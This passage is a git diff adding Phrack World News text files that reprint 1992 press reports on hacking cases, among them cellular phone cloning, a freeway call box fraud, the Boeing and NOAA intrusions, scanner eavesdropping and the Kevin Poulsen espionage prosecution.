+New York City, Washington, Philadelphia, Cambridge, St. Louis, Chicago, Los
+Angeles and San Francisco.  They are regularly attended by a variety of persons
+interested in telecommunications and so-called "hacker issues".
+_______________________________________________________________________________
+
+ Secret Service Grabs Computers In College Raid               December 17, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Joe Abernathy (The Houston Chronicle)(Page A37)
+
+The Secret Service has raided a dorm room at Texas Tech University, seizing the
+computers of two Houston-area students who allegedly used an international
+computer network to steal computer software.
+
+Agents refused to release the names of the two area men and a third man, a
+former Tech student from Austin, who were not arrested in the late-morning raid
+Monday at the university in Lubbock.  Their cases will be presented to a grand
+jury in January.
+
+The three, in their early 20s, are expected to be charged with computer crime,
+interstate transport of stolen property and copyright infringements.
+
+"The university detected it," said Agent R. David Freriks of the Secret Service
+office in Dallas, which handled the case.  He said Texas Tech computer system
+operators noticed personal credit information mixed in with the software
+mysteriously filling up their data storage devices.
+
+The former student admitted pirating at least $6,000 worth of games and
+programs this summer, Freriks said.
+
+The raid is the first to fall under a much broader felony definition of
+computer software piracy that could affect many Americans.
+
+Agents allege the three used the Internet computer network, which connects up
+to 15 million people in more than 40 nations, to make contacts with whom they
+could trade pirated software.  The software was transferred over the network,
+into Texas Tech's computers and eventually into their personal computers.
+
+The Software Publishers Association, a software industry group chartered to
+fight piracy, contends the industry lost $1.2 billion in sales in 1991 to
+pirates.
+
+Although these figures are widely questioned for their accuracy, piracy is
+widespread among Houston's 450-plus computer bulletin boards, and even more so
+on the global Internet.
+
+"There are a lot of underground sites on the Internet run by university system
+administrators, and they have tons of pirated software available to download --
+gigabytes of software," said Scott Chasin, a former computer hacker who is now
+a computer security consultant.
+
+Freriks said the investigation falls under a revision of the copyright laws
+that allows felony charges to be brought against anyone who trades more than 10
+pieces of copyrighted software -- a threshold that would cover many millions of
+Americans who may trade copies of computer programs with their friends.
+
+"The ink is barely dry on the amendment, and you've already got law enforcement
+in there, guns blazing, because somebody's got a dozen copies of stolen
+software," said Marc Rotenberg, director of Computer Professionals for Social
+Responsibility, in Washington.
+
+"That was a bad provision when it was passed, and was considered bad for
+precisely this reason, giving a justification for over-reaching by law
+enforcement."
+
+Freriks said the raid also involved one of the first uses of an expanded right
+to confiscate  computers  used in crime.
+
+"Our biggest complaint has been that you catch 'em and slap 'em on the wrist,
+and then give the smoking gun back," he said.
+
+"So they've changed the law so that we now have forfeiture authority."
+
+The Secret Service already has been under fire for what is seen by civil
+libertarians as an overly casual use of such authority, which many believe has
+mutated from an investigative tool into a de facto punishment without adequate
+court supervision.
+
+_______________________________________________________________________________
+
+ Hacker Taps Into Freeway Call Box -- 11,733 Times             October 23, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Jeffrey A. Perlman (Los Angeles Times)(Page A3)
+
+SANTA ANA, CA -- An enterprising hacker reached out and touched someone 11,733
+times in August -- from a freeway emergency call box in Orange County.
+
+A computer that monitors the county's emergency call boxes attributed 25,875
+minutes of calls to the mysterious caller who telephoned people in countries
+across the globe, according to a staff report prepared for the Orange County
+Transportation Authority.
+
+"This is well over the average of roughly 10 calls per call box," the report
+noted.
+
+About 1,150 bright yellow call boxes have been placed along Orange County's
+freeways to connect stranded motorists to the California Highway Patrol.  But
+the caller charged all his calls to a single box on the shoulder of the Orange
+(57) Freeway.
+
+The hacker apparently matched the individual electronic serial number for the
+call box to its telephone number.  It took an investigation by the transit
+authority, and three cellular communications firms to unravel the mystery, the
+report stated.
+
+Officials with the transit authority's emergency call box program were not
+available to comment on the cost of the phone calls or to say how they would be
+paid.
+
+But the report assured that "action has been taken to correct this problem.  It
+should be noted that this is the first incident of this type in the five-year
+history of the program."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Ring May Be Responsible For Freeway Call Box Scam             October 24, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Jodi Wilgoren (Los Angeles Times)(Page B4)
+
+            "Officials Believe A Hacker Sold Information to Others;
+                  LA Cellular Will Pay For The Excess Calls."
+
+COSTA MESA, CA -- As soon as he saw the August bill for Orange County's freeway
+call boxes, analyst Dana McClure guessed something was awry.
+
+There are typically about 12,000 calls a month from the 1,150 yellow boxes that
+dot the county's freeways.  But in August, there were nearly that many
+registered to a single box on the Orange Freeway a half-mile north of Lambert
+Road in Brea.
+
+"This one stood out, like 'Whoa!'" said McClure, who analyzes the monthly
+computer billing tapes for the Orange County Transportation Authority.  "It
+kicked out as an error because the number of minutes was so far over what it is
+supposed to be."
+
+With help from experts at LA Cellular, which provides the telephone service for
+the boxes, and GTE Cellular, which maintains the phones, McClure and OCTA
+officials determined that the calls -- 11,733 of them totaling 25,875 minutes
+for a charge of about $1,600 -- were made because the hacker learned the code
+and telephone number for the call boxes.
+
+Because of the number of calls in just one month's time, officials believe
+there are many culprits, perhaps a ring of people who bought the numbers from
+the person who cracked the system.
+
+You'd have to talk day and night for 17 or 18 days to do that; it'd be
+fantastic to be able to make that many calls," said Lee Johnson of GTE
+Cellular.
+
+As with all cases in which customers prove they did not make the calls on their
+bills, LA Cellular will pick up the tab, company spokeswoman Gail Pomerantz
+said.  Despite the amount of time involved, the bill was only $1,600, according
+to OCTA spokeswoman Elaine Beno, because the county gets a special emergency
+service rate for the call box lines.
+
+The OCTA will not spend time and money investigating who made the calls;
+however, it has adjusted the system to prevent further fraud.  Jim Goode of LA
+Cellular said such abuses are rare among cellular subscribers, and that such
+have never before been tracked to freeway call boxes.
+
+The call boxes contain solar cellular phones programmed to dial directly to the
+California Highway Patrol or a to a GTE Cellular maintenance line.  The calls
+on the August bill included 800 numbers and 411 information calls and hundreds
+of calls to financial firms in New York, Chicago and Los Angeles.  That calls
+were placed to these outside lines indicates that the intruders made the
+connections from another cellular phone rather than from the call box itself.
+Each cellular phone is assigned a seven-digit Mobile Identification Number that
+functions like a phone number, and a 10- or 11-digit Electronic Service Number
+unique to that particular phone (similar to the vehicle identification number
+assigned every automobile).  By reprogramming another cellular phone with the
+MIN and ESN of the call box phone, a hacker could charge all sorts of calls to
+the OCTA.
+
+"That's not legally allowable, and it's not an easy thing to do," McClure said,
+explaining that the numbers are kept secret and that reprogramming a cellular
+phone could wreck it.  "Most people don't know how to do that, but there are
+some."
+
+Everyone involved with the call box system is confident that the problem has
+been solved, but officials are mum as to how they blocked potential cellular
+banditry.
+
+"I don't think we can tell you what we did to fix it because we don't want it
+to happen again," Beno said with a laugh.
+_______________________________________________________________________________
+
+ FBI Probes Possible Boeing Computer Hacker                    November 6, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Taken from Reuters
+
+SEATTLE -- Federal authorities said Friday they were investigating the
+possibility that a hacker had breached security and invaded a Unix-based
+computer system at the aerospace giant Boeing Co.
+
+The Federal Bureau of Investigation confirmed the probe after a Seattle radio
+station reported it received a facsimile of a Boeing memorandum warning
+employees the security of one of its computer networks may have been violated.
+
+The memo, which had been sent from inside Boeing, said passwords may have been
+compromised, a reporter for the KIRO station told Reuters.
+
+KIRO declined to release a copy of the memorandum or to further identify its
+source.
+
+The memorandum said the problem involved computers using Unix, the open-ended
+operating system used often in engineering work.
+
+Sherry Nebel, a spokeswoman at Boeing's corporate headquarters, declined
+comment on the memorandum or the alleged breach of security and referred all
+calls to the FBI.
+
+An FBI spokesman said the agency was in touch with the company and would
+discuss with it possible breaches of federal law.
+
+No information was immediately available on what type of computer systems may
+have been violated at Boeing, the world's largest commercial aircraft
+manufacturer.
+
+The company, in addition, acts as a defense contractor and its business
+includes work on the B-2 stealth bomber, NASA's space station and the "Star
+Wars" project.
+
+Boeing is a major user of computer technology and runs a computer services
+group valued at $1 billion.
+
+Much of the company's engineering work is conducted using computer -aided
+design (CAD) capabilities.  Boeing currently is pioneering a computerized
+technique which uses 2,000 computer terminals to design its new 777 twinjet.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ FBI Expands Boeing Computer Hacker Probe                      November 9, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Samuel Perry (Reuters)
+
+SEATTLE -- Federal authorities expanded their investigation of a computer
+hacker or hackers suspected of having invaded a computer system at aerospace
+giant and defense contractor Boeing Co.
+
+FBI spokesman Dave Hill said the investigation was expanded after the agency
+discovered similar infiltrations of computer records belonging to the U.S.
+District Court in Seattle and another government agency.
+
+"We're trying to determine if the same individuals are involved here," he said,
+adding more than one suspect may be involved and the purpose of the intrusion
+was unclear.
+
+"We don't think this was an espionage case," Hill said, adding federal agents
+were looking into violations of U.S. law barring breaking into a computer of
+federal interest, but that no government classified data was believed to be
+compromised.
+
+"I'm not sure what their motivation is," he told Reuters.
+
+The FBI confirmed the investigation after a Seattle radio station reported it
+received a facsimile of a Boeing memorandum warning employees that the security
+of one of its computer networks may have been violated.
+
+A news reporter at KIRO Radio, which declined to release the facsimile, said
+it was sent by someone within Boeing and that it said many passwords may have
+been compromised.
+
+Boeing's corporate headquarters has declined to comment on the matter,
+referring all calls to the FBI.
+
+The huge aerospace company, which is the world's largest maker of commercial
+jetliners, relies heavily on computer processing to design and manufacture its
+products. Its data processing arm operates $1.6 billion of computer equipment.
+
+No information was disclosed on what system at Boeing had been compromised.
+But one computer industry official said it could include "applications
+involving some competitive situations in the aerospace industry.
+
+The company is a defense contractor or subcontractor on major U.S. military
+programs, such as the B-2 stealth bomber, the advanced tactical fighter,
+helicopters, the NASA space station and the "Star Wars" missile defense system.
+
+Recently, Boeing has pioneered the unprecedented use of computer-aided design
+capabilities in engineering its new 777 twinjet. The design of the 777 is now
+mostly complete as Boeing prepares for final assembly beginning next year.
+
+That system, which uses three-dimensional graphics to replace a draftsman's
+pencil and paper, includes 2,000 terminals that can tap into data from around
+the world.
+_______________________________________________________________________________
+
+ Hacker Breaches NOAA Net                                        August 3, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ by Kevin Power (Government Computer News)(Page 10)
+
+As a recent breach of the National Oceanic and Atmospheric Administration's
+(NOAA) link to the Internet shows, the network not only benefits scientists but
+also attracts unwanted attention from hackers.
+
+NOAA officials said an intruder in May accessed the agency's TCP/IP network,
+seeking to obtain access to the Internet.  The breach occurred on the National
+Weather Service headquarters' dial-in communications server in Silver Spring,
+Maryland, said Harold Whitt, a senior telecommunications engineer with NOAA.
+
+Cygnus Support, a Palo Alto, California, software company, alerted NOAA
+officials to the local area network security breach when Cygnus found that an
+outsider had accessed one of its servers from the NOAA modem pool and had
+attempted several  long-distance phone calls.
+
+NOAA and Cygnus officials concluded that the perpetrator was searching for an
+Internet host, possibly to locate a games publisher, Whitt said.  Fortunately,
+the hacker did no damage to NOAA's data files, he said.
+
+Whitt said intruders using a modem pool to tap into external networks are
+always a security concern.  But organizations with Internet access seem to be
+hacker favorites, he said.  "There's a lot of need for Internet security,"
+Whitt said.
+
+"You have to make sure you monitor the usage of the TCP/IP network and the
+administration of the local host.  It's a common problem, but in our case we're
+more vulnerable because of tremendous Internet access," Whitt said.
+
+Whitt said NOAA's first response was to terminate all dial-in services
+temporarily and change all the numbers.
+
+Whitt said he also considered installing a caller-identification device for the
+new lines.  But the phone companies have limited capabilities to investigate
+random incidents, he said.
+
+"It's very difficult to isolate problems at the protocol level," Whitt said.
+"We targeted the calls geographically to the Midwest.
+
+"But once you get into the Internet and have an understanding of TCP/IP, you
+can just about go anywhere," Whitt said.
+
+NOAA, a Commerce Department agency, has since instituted stronger password
+controls and installed a commercial dial-back security system, Defender from
+Digital Pathways Inc. of Mountain View, California.
+
+Whitt said the new system requires users to undergo password validation at dial
+time and calls back users to synchronize modems and log calls.  Despite these
+corrective measures, Reed Phillips, Commerce's IRM director, said the NOAA
+incident underlies the axiom that networks always should be considered
+insecure.
+
+At the recent annual conference of the Federation of Government Information
+Processing Councils in New Orleans, Phillips said the government is struggling
+to transmit more information electronically and still maintain control over the
+data.
+
+Phillips said agencies are plagued by user complacency, a lack of
+organizational control, viruses, LAN failures and increasing demands for
+electronic commerce. "I'm amazed that there are managers who believe their
+electronic-mail systems are secure," Phillps said.  "We provide a great deal of
+security, but it can be interrupted.
+
+"Security always gets hits hard in the budget.  But the good news is vendors
+recognize our needs and are coming out with cheaper security tools," Phillips
+said.
+
+Phillips said the NOAA attack shows that agencies must safeguard a network's
+physical points because LANs present more security problems than centralized
+systems.
+
+"The perpetrator can dial in via a modem using the common services provided by
+the telephone company, and the perpetrator risks no personal physical harm.  By
+gaining access to a single system on the network the perpetrator is then able
+to propagate his access rights to multiple systems on the network," Phillips
+said.
+
+"In many LAN environments a user need only log on the network once and all
+subsequent access is assumed to be authorized for the entire LAN.  It then
+becomes virtually impossible for a network manager or security manager to track
+events of a perpetrator," he said.
+_______________________________________________________________________________
+
+ Hackers Scan Airwaves For Conversations                        August 17, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Mark Lewyn (The Washington Post)(Page A1)
+
+                    "Eavesdroppers Tap Into Private Calls."
+
+On the first day of the Soviet coup against Mikhail Gorbachev in August 1991,
+Vice President Quayle placed a call to Senator John C. Danforth (R-Mo.) and
+assessed the tense, unfolding drama.
+
+It turned out not to be a private conversation.
+
+At the time, Quayle was aboard a government jet, flying to Washington from
+California.  As he passed over Amarillo, Texas his conversation, transmitted
+from the plane to Danforth's phone, was picked up by an eavesdropper using
+electronic "scanning" gear that searches the airwaves for radio or wireless
+telephone transmissions and then locks onto them.
+
+The conversation contained no state secrets -- the vice president observed that
+Gorbachev was all but irrelevant and Boris Yeltsin had become the man to watch.
+But it remains a prized catch among the many conversations overhead over many
+years by one of a steadily growing fraternity of amateur electronics
+eavesdroppers who listen in on all sorts of over-the-air transmissions, ranging
+from Air Force One communications to cordless car-phone talk.
+
+One such snoop overheard a March 1990 call placed by Peter Lynch, a well-known
+mutual fund executive in Boston, discussing his forthcoming resignation, an
+event that later startled financial circles.  Another electronic listener
+overheard the chairman of Popeye's Fried Chicken disclose plans for a 1988
+takeover bid for rival Church's Fried Chicken.
+
+Calls by President Bush and a number of Cabinet officers have been intercepted.
+The recordings of car-phone calls made by Virginia Governor L. Douglas Wilder
+(D), intercepted by a Virginia Beach restaurant owner and shared with Senator
+Charles S. Robb (D-Va.), became a cause ce'le'bre in Virginia politics.
+
+Any uncoded call that travels via airwaves, rather than wire, can be picked up,
+thus the possibilities have multiplied steadily with the growth of cellular
+phones in cars and cordless phones in homes and offices.  About 41 percent of
+U.S. households have cordless phones and the number is expected to grow by
+nearly 16 million this year, according to the Washington-based Electronics
+Industry Association.
+
+There are 7.5 million cellular phone subscribers, a technology that passes
+phone calls over the air through a city from one transmission "cell" to the
+next. About 1,500 commercial airliners now have air-to-ground phones -- roughly
+half the U.S. fleet.
+
+So fast-growing is this new form of electronic hacking that it has its own
+magazines, such as Monitoring Times.  "The bulk of the people doing this aren't
+doing it maliciously," said the magazine's editor, Robert Grove, who said he
+has been questioned several times by federal agents, curious about hackers'
+monitoring activities.
+
+But some experts fear the potential for mischief.  The threat to business from
+electronic eavesdropping is "substantial," said Thomas S. Birney III, president
+of Cellular Security Group, a Massachusetts-based consulting group.
+
+Air Force One and other military and government aircraft have secure satellite
+phone links for sensitive conversations with the ground, but because these are
+expensive to use and sometimes not operating, some calls travel over open
+frequencies.  Specific frequencies, such as those used by the president's
+plane, are publicly available and are often listed in "scanners" publications
+and computer bulletin boards.
+
+Bush, for example, was accidentally overheard by a newspaper reporter in 1990
+while talking about the buildup prior to the Persian Gulf War with Senator
+Robert Byrd (D-W.Va.).  The reporter, from the Daily Times in Gloucester,
+Massachusetts quickly began taking notes and the next day, quoted Bush in his
+story under the headline, "Bush Graces City Airspace."
+
+The vice president's chief of staff, William Kristol, was overheard castigating
+one staff aide as a "jerk" for trying to reach him at home.
+
+Some eavesdroppers may be stepping over the legal line, particularly if they
+tape record such conversations.
+
+The Electronic Communications Privacy Act prohibits intentional monitoring,
+taping or distribution of the content of most electronic, wire or private oral
+communications.  Cellular phone calls are explicitly protected under this act.
+Local laws often also prohibit such activity.  However, some lawyers said that
+under federal law, it is legal to intercept cordless telephone conversations as
+well as conversations on an open radio channel.
+
+The government rarely prosecutes such cases because such eavesdroppers are
+difficult to catch.  Not only that, it is hard to win convictions against
+"listening Toms," lawyers said, because prosecutors must prove the
+eavesdropping was intentional.
+
+"Unless they prove intent they are not going to win," said Frank Terranella,
+general counsel for the Association of North American Radio Clubs in Clifton,
+New Jersey.  "It's a very tough prosecution for them."
+
+To help curb eavesdropping, the House has passed a measure sponsored by Rep.
+Edward J. Markey (D-Mass.), chairman of the House telecommunications and
+finance subcommittee, that would require the Federal Communications Commission
+to outlaw any scanner that could receive cellular frequencies.  The bill has
+been sent to the Senate.
+
+But there are about 10 million scanners in use, industry experts report, and
+this year sales of scanners and related equipment such as antennas will top
+$100 million.
+
+Dedicated scanners, who collect the phone calls of high-ranking government
+officials the way kids collect baseball cards, assemble basements full of
+electronic gear.
+
+In one sense, the electronic eavesdroppers are advanced versions of the
+ambulance chasers who monitor police and fire calls with simpler scanning
+equipment and then race to the scene of blazes and accidents for a close look.
+But they also have kinship with the computer hackers who toil at breaking into
+complex computer systems and rummaging around other's files and software
+programs.
+
+One New England eavesdropper has four scanners, each one connected to its own
+computer, with a variety of frequencies programmed.  When a conversation
+appears on a pre-selected frequency, a computer automatically locks in on the
+frequency to capture it.  He also keeps a scanner in his car, for entertainment
+along the road.
+
+He justifies his avocation with a seemingly tortured logic.  "I'm not going out
+and stealing these signals," he said.  "They're coming into my home, right
+through my windows."
+_______________________________________________________________________________
+
+ Why Cybercrooks Love Cellular                                December 21, 1989
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by William G. Flanagan and Brigid McMenamin (Forbes)(Page 189)
+
+Cellular phones provide cybercrooks with golden opportunities for telephone
+toll fraud, as many shocked cellular customers are discovering.  For example,
+one US West Cellular customer in Albuquerque recently received a hefty
+telephone bill.
+
+Total: $20,000.
+
+Customers are not held responsible when their phone numbers are ripped off and
+misused.  But you may be forced to have your cellular phone number changed.
+The cellular carriers are the big losers -- to the tune of an estimated $300
+million per year in unauthorized calls.
+
+How do the crooks get the numbers?  There are two common methods: cloning and
+tumbling.
+
+Each cellular phone has two numbers -- a mobile identification number (MIN) and
+an electronic serial number (ESN).  Every time you make a call, the chip
+transmits both numbers to the local switching office for verification and
+billing.
+
+Cloning involves altering the microchip in another cellular phone so that both
+the MIN and ESN numbers match those stolen from a bona fide customer.  The
+altering can be done with a personal computer. The MIN and ESN numbers are
+either purchased from insiders or plucked from the airwaves with a legal
+device, about the size of a textbook, that can be plugged into a vehicle's
+cigarette lighter receptacle.
+
+Cellular companies are starting to watch for suspicious calling patterns.  But
+the cloning may not be detected until the customer gets his bill.
+
+The second method -- tumbling -- also involves using a personal computer to
+alter a microchip in a cellular phone so that its numbers change after every
+phone call.  Tumbling doesn't require any signal plucking.  It takes advantage
+of the fact that cellular companies allow "roaming" -- letting you make calls
+away from your home area.
+
+When you use a cellular phone far from your home base, it may take too long for
+the local switching office to verify your MIN and ESN numbers.  So the first
+call usually goes through while the verification goes on.  If the numbers are
+invalid, no more calls will be permitted by that office on that phone.
+
+In 1987 a California hacker figured out how to use his personal computer to
+reprogram the chip in a cellular phone.  Authorities say one of his pals
+started selling altered chips and chipped-up phones.  Other hackers figured out
+how to make the chips generate new, fake ESN numbers every time the cellular
+phone was used, thereby short-circuiting the verification process.  By 1991
+chipped-up, tumbling ESN phones were in use all over the U.S.
+
+The cellular carriers hope to scotch the problem of tumbling with instant
+verification.  But that won't stop the clones.
+
+How do crooks cash in?  Drug dealers buy (for up to $ 3,200) or lease (about
+$750 per day) cellular phones with altered chips.  So do the "call-sell"
+crooks, who retail long distance calls to immigrants often for less than phone
+companies charge.  That's why a victim will get bills for calls all over the
+world, but especially to Colombia, Bolivia and other drug-exporting countries.
diff --git a/phrack41/12.txt b/phrack41/12.txt
new file mode 100644
index 0000000..2a4f0d0
--- /dev/null
+++ b/phrack41/12.txt
@@ -0,0 +1,884 @@
+                                ==Phrack Inc.==
+
+                  Volume Four, Issue Forty-One, File 12 of 13
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN           Issue 41 / Part 2 of 3            PWN
+              PWN                                             PWN
+              PWN        Compiled by Datastream Cowboy        PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+ Government Cracks Down On Hacker                              November 2, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Donald Clark (The San Francisco Chronicle)(Page C1)
+
+         "Civil Libertarians Take Keen Interest In Kevin Poulsen Case"
+
+Breaking new ground in the war on computer crime, the Justice Department plans
+to accuse Silicon Valley's most notorious hacker of espionage.
+
+Kevin Lee Poulsen, 27, touched off a 17-month manhunt before being arrested on
+charges of telecommunications and computer fraud in April 1991.  A federal
+grand jury soon will be asked to issue a new indictment charging Poulsen with
+violating a law against willfully sharing classified information with
+unauthorized persons, assistant U.S. attorney Robert Crowe confirmed.
+
+A 1988 search of Poulsen's Menlo Park storage locker uncovered a set of secret
+orders from a military exercise, plus evidence that Poulsen may have tried to
+log onto an Army data network and eavesdropped on a confidential investigation
+of former Philippine President Ferdinand Marcos.  It is not clear whether the
+new charge stems from these or other acts.
+
+Poulsen did not hand secrets to a foreign power, a more serious crime, Crowe
+noted.  But by using an espionage statute against a U.S. hacker for the first
+time, prosecutors raise the odds of a record jail sentence that could be used
+to deter other electronic break-ins.
+
+They could use a stronger deterrent.  Using personal computers connected to
+telephone lines, cadres of so-called cyberpunks have made a sport of tapping
+into confidential databases and voicemail systems at government agencies and
+corporations.  Though there is no reliable way to tally the damage, a 1989
+survey indicated that computer crimes may cost U.S. business $500 million a
+year, according to the Santa Cruz-based National Center for Computer Crime
+Data.
+
+Telephone companies, whose computers and switching systems have long been among
+hackers' most inviting targets, are among those most anxious to tighten
+security.  Poulsen allegedly roamed at will through the networks of Pacific
+Bell, for example, changing records and even intercepting calls between Pac
+Bell security personnel who were on his trail.
+
+The San Francisco-based utility has been intimately involved in his
+prosecution; Poulsen was actually captured in part because one of the company's
+investigators staked out a suburban Los Angeles supermarket where the fugitive
+shopped.
+
+"Virtually everything we do these days is done in a computer --your credit
+cards, your phone bills," said Kurt von Brauch, a Pac Bell security officer who
+tracked Poulsen, in an interview last year. "He had the knowledge to go in
+there and alter them."
+
+
+BROAD LEGAL IMPACT
+
+Poulsen's case could have broad impact because of several controversial legal
+issues involved.  Some civil libertarians, for example, question the Justice
+Department's use of the espionage statute, which carries a maximum 10-year
+penalty and is treated severely under federal sentencing guidelines.  They
+doubt the law matches the actions of Poulsen, who seems to have been motivated
+more by curiosity than any desire to hurt national security.
+
+"Everything we know about this guy is that he was hacking around systems for
+his own purposes," said Mike Godwin, staff counsel for the Electronic Frontier
+Foundation, a public-interest group that has tracked Poulsen's prosecution.  He
+termed the attempt to use the statute against Poulsen "brain-damaged."
+
+Poulsen, now in federal prison in Pleasanton, has already served 18 months in
+jail without being tried for a crime, much less convicted.  Though federal
+rules are supposed to ensure a speedy trial, federal judges can grant extended
+time to allow pretrial preparation in cases of complex evidence or novel legal
+issues.
+
+Both are involved here.  After he fled to Los Angeles to avoid prosecution,
+for example, Poulsen used a special scrambling scheme on one computer to make
+his data files unintelligible to others.  It has taken months to decode that
+data, and the job isn't done yet, Crowe said.  That PC was only found because
+authorities intercepted one of Poulsen's phone conversations from jail, other
+sources said.
+
+
+CHARGES LABELED ABSURD
+
+Poulsen declined requests for interviews.  His attorney, Paul Meltzer, terms
+the espionage charge absurd.  He is also mounting several unusual attacks on
+parts of the government's original indictment against Poulsen, filed in 1989.
+
+He complains, for example, that the entire defense team is being subjected to
+15-year background checks to obtain security clearances before key documents
+can be examined.
+
+"The legal issues are fascinating," Meltzer said. "The court will be forced to
+make law."
+
+Poulsen's enthusiasm for exploring forbidden computer systems became known to
+authorities in 1983.  The 17-year-old North Hollywood resident, then using the
+handle Dark Dante, allegedly teamed up with an older hacker to break into
+ARPAnet, a Pentagon-organized computer network that links researchers and
+defense contractors around the country. He was not charged with a crime because
+of his age.
+
+Despite those exploits, Poulsen was later hired by SRI International, a Menlo
+Park-based think tank and government contractor, and given an assistant
+programming job with a security clearance.  Though SRI won't comment, one
+source said Poulsen's job involved testing whether a public data network, by
+means of scrambling devices, could be used to confidentially link classified
+government networks.
+
+But Poulsen apparently had other sidelines.  Between 1985 and 1988, the Justice
+Department charges, Poulsen burglarized or used phony identification to sneak
+into several Bay Area phone company offices to steal equipment and confidential
+access codes that helped him monitor calls and change records in Pac Bell
+computers, prosecutors say.
+
+
+CACHE OF PHONE GEAR
+
+The alleged activities came to light because Poulsen did not pay a bill at the
+Menlo/Atherton Storage Facility.  The owner snipped off a padlock on a storage
+locker and found an extraordinary cache of telephone paraphernalia.  A 19-count
+indictment, which also named two of Poulsen's associates, included charges of
+theft of government property, possession of wire-tapping devices and phony
+identification.
+
+One of Poulsen's alleged accomplices, Robert Gilligan, last year pleaded guilty
+to one charge of illegally obtaining Pac Bell access codes.  Under a plea
+bargain, Gilligan received three years of probation, a $25,000 fine, and agreed
+to help authorities in the Poulsen prosecution.  Poulsen's former roommate,
+Mark Lottor, is still awaiting trial.
+
+A key issue in Poulsen's case concerns CPX Caber Dragon, a code name for a
+military exercise in Fort Bragg, North Carolina.  In late 1987 or early 1988,
+the government charges, Poulsen illegally obtained classified orders for the
+exercise.  But Meltzer insists that the orders had been declassified by the
+time they were seized, and were reclassified after the fact to prosecute
+Poulsen.  Crowe said Meltzer has his facts wrong. "That's the same as saying
+we're framing Poulsen," Crowe said. "That's the worst sort of accusation I can
+imagine."
+
+Another dispute focuses on the charge of unauthorized access to government
+computers.  FBI agents found an electronic copy of the banner that a computer
+user sees on first dialing up an Army network called MASNET, which includes a
+warning against unauthorized use of the computer system.  Meltzer says Poulsen
+never got beyond this computer equivalent of a "No Trespassing" sign.
+
+Furthermore, Meltzer argues that the law is unconstitutional because it does
+not sufficiently define whether merely dialing up a computer qualifies as
+illegal "access."
+
+Meltzer also denies that Poulsen could eavesdrop on calls.  The indictment
+accuses him of illegally owning a device called a direct access test unit,
+which it says is "primarily useful" for surreptitiously intercepting
+communications.  But Meltzer cites an equipment manual showing that the system
+is specifically designed to garble conversations, though it allows phone
+company technicians to tell that a line is in use.
+
+Crowe said he will soon file written rebuttals to Meltzer's motions.  In
+addition to the new indictment he is seeking, federal prosecutors in Los
+Angeles are believed to be investigating Poulsen's activities while a fugitive.
+Among other things, Poulsen reportedly taunted FBI agents on computer bulletin
+boards frequented by hackers.
+
+
+PHONE COMPANIES WORRIED
+
+Poulsen's prosecution is important to the government -- and phone companies --
+because of their mixed record so far in getting convictions in hacker cases.
+
+In one of the most embarrassing stumbles, a 19-year-old University of Missouri
+student named Craig Neidorf was indicted in February 1990 on felony charges for
+publishing a memorandum on the emergency 911 system of Bell South.  The case
+collapsed when the phone company information -- which the government said was
+worth $79,940 -- was shown by the defense to be available from another Bell
+system for just $13.50.
+
+Author Bruce Sterling, whose "The Hacker Crackdown" surveys recent high-tech
+crime and punishment, thinks the phone company overstates the dangers from
+young hackers.  On the other hand, a Toronto high school student electronically
+tampered with that city's emergency telephone dispatching system and was
+arrested, he noted.
+
+Because systems that affect public safety are involved, law enforcement
+officials are particularly anxious to win convictions and long jail sentences
+for the likes of Poulsen.
+
+"It's very bad when the government goes out on a case and loses," said one
+computer-security expert who asked not to be identified.  "They are desperately
+trying to find something to hang him on."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Computer Hacker Charged With Stealing Military Secrets        December 8, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Taken from the Associated Press
+
+SAN FRANCISCO -- A computer hacker has been charged with stealing Air Force
+secrets that allegedly included a list of planned targets in a hypothetical
+war.
+
+Former Silicon Valley computer whiz Kevin Poulsen, who was accused in the early
+1980s as part of a major hacking case, was named in a 14-count indictment
+issued Monday.
+
+He and an alleged accomplice already face lesser charges of unlawful use of
+telephone access devices, illegal wiretapping and conspiracy.
+
+Poulsen, 27, of Los Angeles, faces 7-to-10 years in prison if convicted of the
+new charge of gathering defense information, double the sentence he faced
+previously.
+
+His lawyer, Paul Meltzer, says the information was not militarily sensitive and
+that it was reclassified by government officials just so they could prosecute
+Poulsen on a greater charge.
+
+A judge is scheduled to rule February 1 on Meltzer's motion to dismiss the
+charge.
+
+In the early 1980s, Poulsen and another hacker going by the monicker Dark Dante
+were accused of breaking into UCLA's computer network in one of the first
+prosecutions of computer hacking.
+
+He escaped prosecution because he was then a juvenile and went to work at Sun
+Microsystems in Mountain View.
+
+While working for Sun, Poulsen illegally obtained a computer tape containing a
+1987 order concerning a military exercise code-named Caber Dragon 88, the
+government said in court papers.  The order is classified secret and contains
+names of military targets, the government said.
+
+In 1989, Poulsen and two other men were charged with stealing telephone access
+codes from a Pacific Bell office, accessing Pacific Bell computers, obtaining
+unpublished phone numbers for the Soviet Consulate in San Francisco; dealing in
+stolen telephone access codes; and eavesdropping on two telephone company
+investigators.
+
+Poulsen remained at large until a television show elicited a tip that led to
+his capture in April 1991.
+
+He and Mark Lottor, 27, of Menlo Park, are scheduled to be tried in March.  The
+third defendant, Robert Gilligan, has pleaded guilty and agreed to pay Pacific
